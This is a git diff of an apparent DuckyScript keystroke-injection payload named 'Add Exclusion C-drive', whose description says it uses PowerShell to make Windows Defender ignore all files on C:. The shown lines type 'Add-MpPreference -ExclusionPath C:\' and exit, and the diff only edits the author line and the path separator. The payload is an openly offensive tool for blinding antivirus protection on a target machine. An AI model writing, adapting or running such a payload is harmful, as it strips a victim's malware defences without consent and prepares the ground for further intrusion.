diff --git a/Tools/Add Exclusion C-drive.txt b/Tools/Add Exclusion C-drive.txt index 32774f3..a701968 100644 --- a/Tools/Add Exclusion C-drive.txt +++ b/Tools/Add Exclusion C-drive.txt @@ -1,5 +1,5 @@ REM Title: Add Exclusion C-drive -REM Author: @beigeworm +REM Author: @beigeworm | https://github.com/beigeworm REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ REM Target: Windows 10 @@ -16,7 +16,7 @@ ALT y DELAY 5000 REM add the exclusion path. -STRING Add-MpPreference -ExclusionPath C:/ +STRING Add-MpPreference -ExclusionPath C:\ ENTER DELAY 250 STRING exit